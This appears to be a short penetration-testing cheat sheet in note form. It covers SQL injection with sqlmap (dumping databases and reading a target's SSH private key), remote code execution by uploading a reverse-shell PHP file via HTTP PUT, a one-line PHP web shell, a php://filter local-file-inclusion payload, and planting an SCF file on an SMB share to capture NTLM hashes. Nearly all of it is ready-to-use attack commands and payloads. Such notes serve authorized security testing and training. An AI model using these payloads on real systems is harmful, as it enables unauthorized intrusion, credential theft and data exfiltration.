##Save a request inside Burp with the „Save to File” function.
##Lets assume a request where parameter “id” might be injectable. Save request to a file called id.req.
##Then use SQLMap with -p and the name of the parameter to test.
> sqlmap -r id.req -p id

##Another way of telling SQLMap which parameter to test for injecting is by replacing the values of those parameter inside the request file with a wildecard (*). All parameters with a wildcards for a value will be tests for injection. Parameter -p will not be needed in these cases to run SQLMap.
## –dump will dump the content of the databases.
> sqlmap -r file.req –dump
## It is also possible to read local files off the target system.
> sqlmap -r file.req –file-read /home/offensiveuser/.ssh/id_rsa


Manuell injection testing

##Use ‘ to see if a webrequest gives an abnormal response
##Use — – to comment out any concatenating SQL statement that might break the query
##Use URL-encoding inside webbrowser
##Use URL-encoding for everything else inside Brup



RCE via PHP:
##Check if HTTP-PUT Method is allowed or if there is a way to upload any php files
##Execute commands via
> curl -v -X OPTIONS
> curl -v -X PUT -T rev_shell.php

> curl -v -X PUT -d ‘‘my data as a string”
> curl -v -X PUT -d @/path/to/file

##Or save the following code as .php file and upload via application
> <?php system($_REQUEST['offensive']);?>


PHP-Wrapper for LFI:
##Passing as argument (most likely need to point at a .php file)
> (url) ?var1=1&var2=php://filter/convert.base64-encode/resource=/path/to/file.php


Steal NTLM hash with writeable SMB share:
##Put SCF-File inside Windows-Share. SCF-File triggers SMB authentication to responder as soon as an user browses the shares’ direcotry (LINK).
> vim @offensiveIT.scf